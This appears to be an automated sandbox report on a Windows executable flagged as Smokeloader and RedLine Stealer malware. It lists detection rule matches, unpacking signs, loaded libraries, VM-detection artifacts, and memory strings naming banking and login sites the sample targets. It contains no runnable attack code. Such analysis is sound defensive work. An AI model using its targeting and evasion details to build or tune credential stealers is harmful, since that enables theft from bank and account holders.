                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024BDA970_2_024BDA97
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0248CB7E0_2_0248CB7E
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A5BF70_2_024A5BF7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_02497BA70_2_02497BA7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0248ABA70_2_0248ABA7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249D8470_2_0249D847
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AB75E0_2_024AB75E
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A08170_2_024A0817
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B48910_2_024B4891
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B58970_2_024B5897
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AC8B10_2_024AC8B1
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AC94B0_2_024AC94B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024869470_2_02486947
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024899670_2_02489967
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249C9210_2_0249C921
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024999D70_2_024999D7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024889F70_2_024889F7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AC98D0_2_024AC98D
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024AC99C0_2_024AC99C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024B6E670_2_024B6E67
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_02482E370_2_02482E37
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A1F770_2_024A1F77
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_02484F170_2_02484F17
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_02498F350_2_02498F35
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0248DF8C0_2_0248DF8C
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249DFB70_2_0249DFB7
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249DC470_2_0249DC47
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_02485C570_2_02485C57
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0248FC640_2_0248FC64
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024BBC080_2_024BBC08
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_02483C270_2_02483C27
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A4CF40_2_024A4CF4
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024A3C9B0_2_024A3C9B
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: String function: 024881D7 appears 78 times
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: String function: 00414060 appears 74 times
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: String function: 00407F70 appears 46 times
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: String function: 024942C7 appears 74 times
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1760
                      Source: MPgkx6bQIQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000000.00000002.1693514918.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: MPgkx6bQIQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@10/2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_008EA28E CreateToolhelp32Snapshot,Module32First,0_2_008EA28E
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_004361E0
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7680
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0bee489a-e8c0-4ab6-8733-c0cbf5a717d8Jump to behavior
                      Source: MPgkx6bQIQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1514818797.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1515488077.0000000003065000.00000004.00000800.00020000.00000000.sdmp, MPgkx6bQIQ.exe, 00000000.00000003.1538531739.0000000003093000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: MPgkx6bQIQ.exeVirustotal: Detection: 41%
                      Source: MPgkx6bQIQ.exeReversingLabs: Detection: 55%
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile read: C:\Users\user\Desktop\MPgkx6bQIQ.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\MPgkx6bQIQ.exe "C:\Users\user\Desktop\MPgkx6bQIQ.exe"
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 1760
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeUnpacked PE file: 0.2.MPgkx6bQIQ.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeUnpacked PE file: 0.2.MPgkx6bQIQ.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043F83E push es; retf 0_2_0043F83F
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0041ACF6 push esp; iretd 0_2_0041ACFF
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_00444520 push ebp; ret 0_2_00444522
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0043BF00 push eax; mov dword ptr [esp], 49484716h0_2_0043BF01
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_008ECCDD pushad ; ret 0_2_008ECCE2
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_008ECF63 push ebp; ret 0_2_008ECF68
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024BC167 push eax; mov dword ptr [esp], 49484716h0_2_024BC168
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_024BF6A5 push es; retf 0_2_024BF6A6
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeCode function: 0_2_0249AF5D push esp; iretd 0_2_0249AF66
                      Source: MPgkx6bQIQ.exeStatic PE information: section name: .text entropy: 7.370191608980691
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe TID: 7772Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\MPgkx6bQIQ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                      Source: Amcache.hve.5.drBinary or memory string: VMware
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                      Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                      Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                      Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                      Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                      Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000925000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                      Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                      Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                      Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                      Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: MPgkx6bQIQ.exe, 00000000.00000003.1537977940.00000000030B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
